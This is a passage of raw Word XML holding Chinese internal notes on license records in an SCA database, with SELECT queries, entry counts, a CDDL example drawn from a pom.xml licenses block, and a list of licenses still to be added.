            <wp:effectExtent l="0" t="0" r="6350" b="12065"/>
            <wp:docPr id="4969437" name="图片 4969437"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437" name="图片 4969437" descr="图形用户界面, 文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4748530" cy="1572895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FBF4E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是如果删除的不成样子的话，会直接报错识别不出来，如下</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289ACA43" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3EB55B58" wp14:editId="4E7E14C3">
            <wp:extent cx="2934970" cy="1399540"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="1731196586" name="图片 173119658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96586" name="图片 1731196586" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2934970" cy="1399540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E3C48" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="55EF55DB" wp14:editId="59BD844E">
            <wp:extent cx="5449570" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:docPr id="741939711" name="图片 74193971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39711" name="图片 741939711" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5449570" cy="698500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B7ED5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77ED81B3" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D95A570" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="576" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>sca</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>数据库中的</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8ABCE" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>单选</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>license_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE3C9E2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4F152" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select license_id from sca.oss_components_maven_licenses group by license_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A80FA" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E2B469" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前共</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2486</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个条目，有</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>者</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>420</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013005D4" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5C35C9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>鹏哥的</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>license</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E883A76" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select * from sca.license;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B378910" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C91F1E1" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>489</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个条目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F93CC5" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259D5152" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>表中没有各种协议的</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F458504" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="490CB635" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="576" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B6DB3C" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CDDL</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D054752" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如有</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>411ec9703c80575c97d067e793da85b7</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uuid</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组件为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8DC2F2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7C938F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>COMMON DEVELOPMENT AND DISTRIBUTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935A007" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句搜索如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09490689" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select * from sca.oss_components_maven ocm where uuid = '411ec9703c80575c97d067e793da85b7';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C6F04" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138BBD9A" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原文为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F58BEB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;licenses&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105A171" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;license&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F5B9E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;name&gt;Common Development and Distribution License&lt;/name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483AA7FF" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;url&gt;http://www.opensource.org/licenses/CDDL-1.0&lt;/url&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BB52F" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/license&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7293DB" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/licenses&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F12D9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA2E3F3" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可见</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDDL</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议只在</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中才能直接看到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FC84D" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8428E2" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C214A0E" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="340" w:after="330" w:line="576" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="44"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>需要补充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6422E0E9" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291B4514" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APL2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635E277" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏有</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APL-1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是没有</w:t>
      </w:r>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DACAC" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55161A39" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SendBird Desk SDK License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8F172" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SendBird SyncManager SDK License</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28537C1B" w14:textId="77777777" w:rsidR="008941B7" w:rsidRPr="008941B7" w:rsidRDefault="008941B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008941B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
